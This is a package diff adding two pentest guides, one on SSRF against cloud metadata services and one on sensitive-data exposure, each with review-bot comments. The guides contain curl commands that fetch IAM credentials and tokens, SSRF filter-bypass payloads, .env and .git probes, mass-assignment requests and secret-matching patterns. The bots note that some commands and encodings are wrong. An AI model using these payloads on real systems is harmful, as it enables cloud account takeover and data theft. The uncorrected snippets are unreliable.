@soulofzephir/pi-skill-pentesting 1.0.2 → 1.0.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,290 @@
1
+ # Cloud Metadata Service Security
2
+
3
+ ## ๐Ÿ” What is Cloud Metadata?
4
+
5
+ Cloud providers expose instance metadata at a well-known IP address. This can contain sensitive information including credentials!
6
+
7
+ ---
8
+
9
+ ## โš ๏ธ CRITICAL: Metadata Endpoints
10
+
11
+ ### AWS EC2
12
+ ```
13
+ http://169.254.169.254/ (latest)
14
+ http://169.254.169.254/2009-04-04/ (specific version)
15
+ http://169.254.169.254/latest/meta-data/
16
+ http://169.254.169.254/latest/user-data/
17
+ ```
18
+
19
+ ### Google Cloud Platform (GCP)
20
+ ```
21
+ http://metadata.google.internal/computeMetadata/v1/
22
+ http://metadata.google.internal/computeMetadata/v1/instance/
23
+ http://metadata.google.internal/computeMetadata/v1/project/
24
+ ```
25
+
26
+ ### Microsoft Azure
27
+ ```
28
+ http://169.254.169.254/metadata/instance
29
+ http://169.254.169.254/metadata/instance?api-version=2021-02-01
30
+ ```
31
+
32
+ ### DigitalOcean
33
+ ```
34
+ http://169.254.169.254/metadata/v1/
35
+ http://169.254.169.254/metadata/v1.json
36
+ ```
37
+
38
+ ---
39
+
40
+ ## โš ๏ธ SSRF to Cloud Metadata - CRITICAL
41
+
42
+ **Attack Vector:**
43
+ ```
44
+ Attacker finds SSRF vulnerability
45
+ โ†“
46
+ Forces application to request metadata endpoint
47
+ โ†“
48
+ Steals cloud credentials
49
+ โ†“
50
+ Full cloud account compromise!
51
+ ```
52
+
53
+ ---
54
+
55
+ ## ๐Ÿงช Testing Checklist
56
+
57
+ ### Phase 1: SSRF Detection
58
+ - [ ] URL parameters tested (url, src, dest, redirect, uri, path)
59
+ - [ ] POST body parameters tested
60
+ - [ ] HTTP headers tested (Referer, X-Forwarded-For)
61
+ - [ ] File upload (path traversal in filename)
62
+ - [ ] SVG upload (XXE)
63
+ - [ ] XML parsers (XXE)
64
+
65
+ ### Phase 2: Metadata Endpoint Access
66
+ - [ ] AWS metadata accessible?
67
+ - [ ] GCP metadata accessible?
68
+ - [ ] Azure metadata accessible?
69
+ - [ ] DigitalOcean metadata accessible?
70
+ - [ ] Alibaba Cloud metadata accessible?
71
+
72
+ ### Phase 3: Metadata Data Exposed
73
+ - [ ] Instance ID exposed
74
+ - [ ] IAM credentials exposed (AWS role)
75
+ - [ ] IAM token exposed
76
+ - [ ] User data exposed (often contains scripts/config)
77
+ - [ ] SSH keys exposed (GCP)
78
+ - [ ] Service account tokens exposed (GCP)
79
+
80
+ ### Phase 4: Credential Exploitation
81
+ - [ ] IAM role can be assumed
82
+ - [ ] AWS CLI configured with stolen credentials
83
+ - [ ] S3 buckets accessible
84
+ - [ ] Other AWS services accessible
85
+
86
+ ---
87
+
88
+ ## ๐Ÿ”ง Testing Commands
89
+
90
+ ### AWS Metadata Check
91
+ ```bash
92
+ # Basic metadata access
93
+ curl http://169.254.169.254/latest/meta-data/
94
+ curl http://169.254.169.254/latest/user-data/
95
+
96
+ # IAM credentials (if vulnerable)
97
+ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
98
+ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
99
+
100
+ # Get token (newer versions)
101
+ curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token: true"
102
+ ```
103
+
104
+ ### GCP Metadata Check
105
+ ```bash
106
+ # Must include header
107
+ curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/
108
+
109
+ # Instance info
110
+ curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/id
111
+
112
+ # Service account
113
+ curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
114
+
115
+ # Access token (if vulnerable!)
116
+ curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
117
+ ```
118
+
119
+ ### Azure Metadata Check
120
+ ```bash
121
+ # Requires API version
122
+ curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
123
+
124
+ # Managed identity token
125
+ curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com"
126
+ ```
127
+
128
+ ### DigitalOcean Metadata
129
+ ```bash
130
+ curl http://169.254.169.254/metadata/v1.json
131
+ curl http://169.254.169.254/metadata/v1/user-data
132
+ ```
133
+
134
+ ---
135
+
136
+ ## ๐Ÿ”ง SSRF Payloads for Metadata
137
+
138
+ ### Basic
139
+ ```
140
+ http://169.254.169.254/
141
+ http://169.254.169.254/latest/meta-data/
142
+ http://169.254.169.254/latest/user-data/
143
+ ```
144
+
145
+ ### With Headers
146
+ ```bash
147
+ # AWS - get token first
148
+ curl -X PUT -H "X-aws-ec2-metadata-token: anything" http://target.com/url?param=http://169.254.169.254/latest/meta-data/
149
+
150
+ # GCP - require header
151
+ curl -H "Metadata-Flavor: Google" http://target.com/url?param=http://metadata.google.internal/
152
+ ```
153
+
154
+ ### Bypass Filters
155
+ ```bash
156
+ # IP encoding
157
+ http://127.0.0.1
158
+ http://2130706433 (decimal)
159
+ http://0x7f000001 (hex)
160
+ http://[::1]
161
+
162
+ # URL encoding
163
+ http://169.254.169.254 โ†’ http://%31%36%39.%32%35%34.%31%36%39.%32%35%34
164
+
165
+ # DNS rebinding
166
+ http://attacker.com -> points to 169.254.169.254
167
+
168
+ # Open redirect
169
+ http://target.com/redirect?url=http://169.254.169.254/
170
+ ```
171
+
172
+ ---
173
+
174
+ ## ๐Ÿ“‹ SSRF Test Parameters
175
+
176
+ Common parameter names to test:
177
+ ```
178
+ url
179
+ src
180
+ source
181
+ uri
182
+ link
183
+ redirect
184
+ path
185
+ continue
186
+ url
187
+ window
188
+ next
189
+ data
190
+ reference
191
+ spider
192
+ baseUrl
193
+ xml
194
+ view
195
+ doc
196
+ site
197
+ html
198
+ feed
199
+ host
200
+ port
201
+ to
202
+ out
203
+ view
204
+ dir
205
+ show
206
+ navigation
207
+ open
208
+ file
209
+ val
210
+ validate
211
+ domain
212
+ callback
213
+ return
214
+ page
215
+ feed
216
+ host
217
+ pass
218
+ data
219
+ address
220
+ link
221
+ url
222
+ ```
223
+
224
+ ---
225
+
226
+ ## ๐Ÿ›ก๏ธ Cloud Metadata Protection Checklist
227
+
228
+ ### For Cloud Providers (Disable IMDS)
229
+ ```bash
230
+ # AWS - require IMDSv2
231
+ aws ec2 modify-instance-metadata-options \
232
+ --instance-id i-1234567890abcdef0 \
233
+ --http-tokens required \
234
+ --http-put-response-hop-limit 1
235
+
236
+ # GCP - disable via metadata server
237
+ # No direct disable, but use:
238
+ # - Service account with minimal permissions
239
+ # - No legacy endpoints
240
+ # - VPC firewall rules
241
+
242
+ # Azure
243
+ # Use IMDS with managed identity
244
+ # Restrict via firewall
245
+ ```
246
+
247
+ ### For Application Developers
248
+ - [ ] Validate all user input
249
+ - [ ] Use allowlist for URLs
250
+ - [ ] Block private IP ranges
251
+ - [ ] Disable unnecessary URL schemas
252
+ - [ ] Use security library (no direct URL fetching)
253
+ - [ ] Implement SSRF protection
254
+ - [ ] Log SSRF attempts
255
+
256
+ ### For Cloud Security
257
+ - [ ] Use IMDSv2 (AWS)
258
+ - [ ] Use service accounts with minimal privileges
259
+ - [ ] No long-lived credentials in instance metadata
260
+ - [ ] Regular audit of IAM roles
261
+ - [ ] Enable VPC endpoints
262
+ - [ ] Network segmentation
263
+
264
+ ---
265
+
266
+ ## ๐Ÿ“Š Risk Assessment
267
+
268
+ | Finding | Severity | CVSS |
269
+ |---------|----------|------|
270
+ | AWS metadata accessible | ๐Ÿ”ด CRITICAL | 10.0 |
271
+ | GCP service account token stolen | ๐Ÿ”ด CRITICAL | 10.0 |
272
+ | Azure managed identity exploited | ๐Ÿ”ด CRITICAL | 9.8 |
273
+ | Arbitrary file read (metadata) | ๐Ÿ”ด CRITICAL | 9.8 |
274
+ | SSRF without credentials | ๐ŸŸ  HIGH | 8.6 |
275
+
276
+ ---
277
+
278
+ ## ๐Ÿšจ Real-World Impact
279
+
280
+ ```
281
+ 1. Attacker finds SSRF in web app
282
+ 2. Attacker requests AWS metadata
283
+ 3. Attacker steals IAM credentials
284
+ 4. Attacker assumes admin role
285
+ 5. Attacker has full AWS access
286
+ 6. Attacker exfiltrates all data
287
+ 7. Attacker creates backdoor
288
+ ```
289
+
290
+ **Prevention:** Always assume SSRF exists, protect metadata endpoints!
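Review bot: The IMDSv2 token request under "AWS Metadata Check" sends the wrong header, so `curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token: true"` is rejected by the service as written; the PUT needs `X-aws-ec2-metadata-token-ttl-seconds: 21600`, and only the token it returns is then passed as `X-aws-ec2-metadata-token` on later GETs. The same mistake is repeated in "SSRF Payloads for Metadata > With Headers" (`X-aws-ec2-metadata-token: anything`), and it also buries the defensive point the document should make: IMDSv2 requires a PUT with a caller-controlled header, which an ordinary SSRF primitive cannot send, and that is exactly why `--http-tokens required` in the protection section is the recommended fix. Two related inconsistencies: the "Bypass Filters" decimal and hex encodings (`2130706433`, `0x7f000001`) are encodings of 127.0.0.1, not of 169.254.169.254, so they do not match the stated target; and the developer checklist item "Block private IP ranges" misses 169.254.0.0/16, which is link-local rather than RFC 1918, so a denylist built only from private ranges still lets the metadata address through (the "For Cloud Providers (Disable IMDS)" heading also oversells its commands, which require IMDSv2 rather than disabling the service). Minor: the "SSRF Test Parameters" list repeats `url`, `feed`, `host`, `view`, `data` and `link`.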
@@ -0,0 +1,323 @@
1
+ # Sensitive Data Exposure Detection
2
+
3
+ ## ๐Ÿ” What is Sensitive Data?
4
+
5
+ Data that must be protected from unauthorized access:
6
+ - Personal Identifiable Information (PII)
7
+ - Financial data
8
+ - Authentication credentials
9
+ - Healthcare information
10
+ - Business secrets
11
+
12
+ ---
13
+
14
+ ## โš ๏ธ Common Sources of Data Exposure
15
+
16
+ ### 1. Source Code Exposure
17
+ ```
18
+ .git/ directory
19
+ _backup.zip
20
+ *.bak
21
+ *.swp
22
+ *.tmp
23
+ ```
24
+
25
+ ### 2. Configuration Files
26
+ ```
27
+ .env
28
+ config.php
29
+ wp-config.php
30
+ settings.py
31
+ application.properties
32
+ ```
33
+
34
+ ### 3. API Responses
35
+ ```
36
+ Excessive data exposure
37
+ Missing field filtering
38
+ Debug responses
39
+ ```
40
+
41
+ ### 4. Client-Side Data
42
+ ```
43
+ JavaScript source maps
44
+ localStorage/sessionStorage
45
+ Cookies
46
+ URL parameters
47
+ ```
48
+
49
+ ---
50
+
51
+ ## ๐Ÿงช Testing Checklist
52
+
53
+ ### Phase 1: Sensitive Files
54
+ - [ ] `.env` files exposed
55
+ - [ ] `.git/` directory accessible
56
+ - [ ] Backup files exposed
57
+ - [ ] Configuration files accessible
58
+ - [ ] Database dumps exposed
59
+
60
+ ### Phase 2: Source Code
61
+ - [ ] Source maps (.map) exposed
62
+ - [ ] JavaScript source code analyzed
63
+ - [ ] Debug endpoints accessible
64
+ - [ ] Swagger/OpenAPI docs exposed
65
+ - [ ] Internal paths in JS
66
+
67
+ ### Phase 3: API Responses
68
+ - [ ] Full data returned vs needed
69
+ - [ ] Hidden fields in JSON
70
+ - [ ] Passwords in responses
71
+ - [ ] Internal IDs exposed
72
+ - [ ] Stack traces in errors
73
+
74
+ ### Phase 4: Client Storage
75
+ - [ ] Sensitive data in localStorage
76
+ - [ ] Sensitive data in sessionStorage
77
+ - [ ] Sensitive data in cookies
78
+ - [ ] Sensitive data in URL
79
+ - [ ] Browser history
80
+
81
+ ### Phase 5: Credentials Detection
82
+ - [ ] API keys in source code
83
+ - [ ] AWS credentials in source
84
+ - [ ] Private keys exposed
85
+ - [ ] Database passwords
86
+ - [ ] JWT tokens
87
+
88
+ ### Phase 6: PII Exposure
89
+ - [ ] Email addresses
90
+ - [ ] Phone numbers
91
+ - [ ] Physical addresses
92
+ - [ ] Social security numbers
93
+ - [ ] Dates of birth
94
+
95
+ ---
96
+
97
+ ## ๐Ÿ”ง Detection Tools
98
+
99
+ ### grep for Secrets
100
+ ```bash
101
+ # Search for API keys
102
+ grep -r "api_key\|apikey\|api-key" . --include="*.js" --include="*.json"
103
+ grep -r "aws_access_key\|aws_secret" . --include="*.py" --include="*.js"
104
+ grep -r "password\|pwd\|pass" . --include="*.js" --include="*.json"
105
+
106
+ # Search for tokens
107
+ grep -r "token\|bearer\|authorization" . --include="*.js" --include="*.json"
108
+
109
+ # Search for private keys
110
+ grep -r "BEGIN RSA PRIVATE KEY\|BEGIN PRIVATE KEY" .
111
+ ```
112
+
113
+ ### trufflehog (Secrets Scanner)
114
+ ```bash
115
+ # Scan git repo
116
+ trufflehog git https://github.com/target/repo.git
117
+
118
+ # Scan filesystem
119
+ trufflehog filesystem .
120
+
121
+ # Scan S3 bucket
122
+ trufflehog s3 --bucket=bucket-name
123
+
124
+ # Scan GitHub org
125
+ trufflehog github --org=target-org
126
+ ```
127
+
128
+ ### gitrob (GitHub Recon)
129
+ ```bash
130
+ gitrob target --no-gist
131
+ ```
132
+
133
+ ### gitleaks (Secret Scanner)
134
+ ```bash
135
+ # Scan repo
136
+ gitleaks detect --source .
137
+
138
+ # Scan with config
139
+ gitleaks detect --source . --config gitleaks.toml
140
+ ```
141
+
142
+ ### shhgit (Real-time GitHub Scanning)
143
+ ```bash
144
+ shhgit -domain github.com -search-keyword "target"
145
+ ```
146
+
147
+ ---
148
+
149
+ ## ๐Ÿ”ง Pattern Detection
150
+
151
+ ### API Keys & Tokens
152
+ ```
153
+ AKIA[0-9A-Z]{16} โ†’ AWS Access Key
154
+ [0-9a-zA-Z+/]{40} โ†’ AWS Secret Key (base64)
155
+ AIza[0-9A-Za-z_-]{35} โ†’ Google API Key
156
+ sk_live_[0-9a-z]{24,32} โ†’ Stripe
157
+ sk_test_[0-9a-z]{24,32} โ†’ Stripe Test
158
+ ghp_[0-9a-zA-Z]{36} โ†’ GitHub Personal Access Token
159
+ xox[baprs]-[0-9a-zA-Z]{10,} โ†’ Slack Token
160
+ ```
161
+
162
+ ### Password Patterns
163
+ ```
164
+ password=.*
165
+ pwd=.*
166
+ pass=.*
167
+ secret=.*
168
+ credential=.*
169
+ ```
170
+
171
+ ### Private Keys
172
+ ```
173
+ -----BEGIN RSA PRIVATE KEY-----
174
+ -----BEGIN EC PRIVATE KEY-----
175
+ -----BEGIN PRIVATE KEY-----
176
+ -----BEGIN OPENSSH PRIVATE KEY-----
177
+ ```
178
+
179
+ ### JWT Tokens
180
+ ```
181
+ eyJ[0-9A-Za-z_-]*\.eyJ[0-9A-Za-z_-]*\.[0-9A-Za-z_-]*
182
+ ```
183
+
184
+ ---
185
+
186
+ ## ๐Ÿ”ง File Patterns to Check
187
+
188
+ ```bash
189
+ # Configuration
190
+ find . -name ".env*" -o -name "*.config*" -o -name "config.*"
191
+ find . -name "*.php" -o -name "*.py" -o -name "*.js"
192
+
193
+ # Backups
194
+ find . -name "*.bak" -o -name "*.backup" -o -name "*.old"
195
+ find . -name "*.zip" -o -name "*.tar" -o -name "*.tar.gz"
196
+
197
+ # Source control
198
+ find . -name ".git" -type d
199
+ find . -name ".svn" -type d
200
+
201
+ # Keys
202
+ find . -name "*.pem" -o -name "*.key" -o -name "*.p12"
203
+ ```
204
+
205
+ ---
206
+
207
+ ## ๐Ÿ“‹ Data Classification
208
+
209
+ | Type | Sensitivity | Examples |
210
+ |------|------------|----------|
211
+ | ๐Ÿ”ด Critical | Highest | Passwords, Private Keys, SSN |
212
+ | ๐ŸŸ  High | High | API Keys, Tokens, Credit Cards |
213
+ | ๐ŸŸก Medium | Medium | Email, Phone, Addresses |
214
+ | ๐ŸŸข Low | Low | Public data |
215
+
216
+ ---
217
+
218
+ ## ๐Ÿ› ๏ธ API Response Analysis
219
+
220
+ ### Test for Excessive Data
221
+ ```bash
222
+ # Get user profile - should only return needed fields
223
+ curl -X GET /api/user/123
224
+
225
+ # Check if returns:
226
+ # - Password hash
227
+ # - Internal IDs
228
+ # - Debug info
229
+ # - Other users' data
230
+ ```
231
+
232
+ ### Test for Hidden Fields
233
+ ```html
234
+ <!-- Check HTML forms for hidden inputs -->
235
+ <input type="hidden" name="admin" value="true">
236
+ <input type="hidden" name="role" value="user">
237
+
238
+ # Change hidden field values
239
+ curl -X POST /api/update -d "role=admin" -d "user_id=123"
240
+ ```
241
+
242
+ ### Test for Mass Assignment
243
+ ```bash
244
+ # Try adding extra fields
245
+ curl -X POST /api/user -d "name=test&email=test@test.com&admin=true"
246
+ curl -X PUT /api/user/123 -d "balance=1000&admin=true"
247
+ ```
248
+
249
+ ---
250
+
251
+ ## ๐Ÿ“Š Exposure Risk Matrix
252
+
253
+ | Exposure Type | Risk | CVSS |
254
+ |---------------|------|------|
255
+ | Database credentials | ๐Ÿ”ด CRITICAL | 9.8 |
256
+ | AWS keys exposed | ๐Ÿ”ด CRITICAL | 9.8 |
257
+ | Private keys | ๐Ÿ”ด CRITICAL | 9.8 |
258
+ | API keys exposed | ๐ŸŸ  HIGH | 7.5 |
259
+ | PII in logs | ๐ŸŸ  HIGH | 7.1 |
260
+ | Token in URL | ๐ŸŸก MEDIUM | 6.5 |
261
+ | Debug info | ๐ŸŸก MEDIUM | 5.3 |
262
+
263
+ ---
264
+
265
+ ## ๐Ÿ›ก๏ธ Prevention Checklist
266
+
267
+ ### Source Code
268
+ - [ ] .git/ blocked by web server
269
+ - [ ] No backup files in web root
270
+ - [ ] Source maps disabled in production
271
+ - [ ] No secrets in code
272
+
273
+ ### API Responses
274
+ - [ ] Only return needed fields
275
+ - [ ] No passwords/tokens in responses
276
+ - [ ] No internal IDs
277
+ - [ ] Error handling doesn't leak info
278
+
279
+ ### Client Storage
280
+ - [ ] No sensitive data in localStorage
281
+ - [ ] Cookies HttpOnly + Secure
282
+ - [ ] No sensitive data in URL
283
+
284
+ ### Secrets Management
285
+ - [ ] Use environment variables
286
+ - [ ] Use secret management services
287
+ - [ ] Rotate secrets regularly
288
+ - [ ] No default passwords
289
+
290
+ ---
291
+
292
+ ## ๐Ÿ” Quick Scan Commands
293
+
294
+ ```bash
295
+ # Search for secrets in JS files
296
+ grep -rn "password\|api_key\|secret\|token" --include="*.js" .
297
+
298
+ # Check for exposed .env
299
+ curl -s target.com/.env | head -20
300
+
301
+ # Check for git directory
302
+ curl -s target.com/.git/config
303
+
304
+ # Check for backups
305
+ curl -s target.com/backup.zip -o /dev/null -w "%{http_code}"
306
+
307
+ # Check API response for sensitive data
308
+ curl -s /api/user/1 | jq 'keys'
309
+ ```
310
+
311
+ ---
312
+
313
+ ## ๐Ÿ“‹ Sensitive Data Checklist Summary
314
+
315
+ | Check | Status | Severity |
316
+ |-------|--------|----------|
317
+ | .env exposed | โ˜ | ๐Ÿ”ด CRITICAL |
318
+ | .git accessible | โ˜ | ๐Ÿ”ด CRITICAL |
319
+ | API keys in JS | โ˜ | ๐ŸŸ  HIGH |
320
+ | Passwords in response | โ˜ | ๐Ÿ”ด CRITICAL |
321
+ | PII exposed | โ˜ | ๐ŸŸ  HIGH |
322
+ | Token in URL | โ˜ | ๐ŸŸก MEDIUM |
323
+ | Debug mode | โ˜ | ๐ŸŸ  HIGH |
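Review bot: The "Test for Hidden Fields" block is fenced as html but its second half (`# Change hidden field values` and the `curl -X POST /api/update ...` line) is shell, so a bash comment and command render as HTML; split it into an html fence for the two `<input>` lines and a bash fence for the curl. Related, every curl invocation with a path-only URL (`curl -X GET /api/user/123`, `curl -X POST /api/update ...`, `curl -X POST /api/user ...`, `curl -X PUT /api/user/123 ...`, `curl -s /api/user/1 | jq 'keys'`) fails because curl needs a scheme and host; prefix them with a placeholder such as `https://target.com` as the other snippets do. On detection accuracy: `[0-9a-zA-Z+/]{40} → AWS Secret Key (base64)` matches any 40-character alphanumeric run (every SHA-1 commit hash, most base64 blobs) and should be tied to an adjacent `aws_secret_access_key`-style key name to be useful, and the `grep -r "password\|pwd\|pass"` and `"token\|bearer\|authorization"` lines will match `bypass`, `passport`, `tokenizer` and similar; `-i` with word boundaries (`\bpass\b`) or the gitleaks/trufflehog rules already recommended in the same section would cut the noise. Minor: `find . -name "*.php" -o -name "*.py" -o -name "*.js"` under `# Configuration` lists every source file rather than configuration, and the classification table rates API keys High while the risk matrix rates "AWS keys exposed" Critical; state which applies.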